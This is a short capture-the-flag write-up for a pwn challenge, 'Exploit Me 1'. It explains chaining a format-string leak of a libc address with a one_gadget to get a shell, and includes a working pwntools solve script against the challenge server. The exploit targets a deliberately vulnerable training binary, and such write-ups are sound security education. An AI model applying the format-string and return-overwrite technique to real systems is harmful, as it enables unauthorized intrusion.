# [EN] Exploit Me 1
###### tags: `Writeup` `Pwn` `English`
> [name=Curious]
## Train of Thought & Solution
First, put `chal` into IDA
It can be observed that this challenge can utilize an FMT leak to obtain an address, and then utilize a One Gadget to gain shell access. Therefore, it is necessary to leak the address of the libc
Next, let's take a look at the conditions for the One Gadget
If you carefully examine the asm of `main`, you can notice that at the end, there are `xor rsi, rsi` and `xor rdx, rdx` instructions. Therefore, the conditions for the One Gadget boil down to requiring `rbp - 0x78` to be writable. Since we've already leaked the libc address, we can directly use an address from the writable segment of libc to write to `rbp`
Solve Script :
```python=
from pwn import *
context.arch = 'amd64'
# r = process('./chal')
r = remote('lotuxctf.com', 10007)
r.sendlineafter(b'> ', b'%9$p')
libc = int(r.recvline().strip(), 16) - 0x029d90
info(f'libc : {hex(libc)}')
one_gadget = libc + 0xebcf8
buf = libc + 0x21af00
r.sendlineafter(b'> ', b'a' * 0x10 + flat(buf, one_gadget))
r.interactive()
```
{%hackmd M1bgOPoiQbmM0JRHWaYA1g %}
Sign in with Wallet
Connect another wallet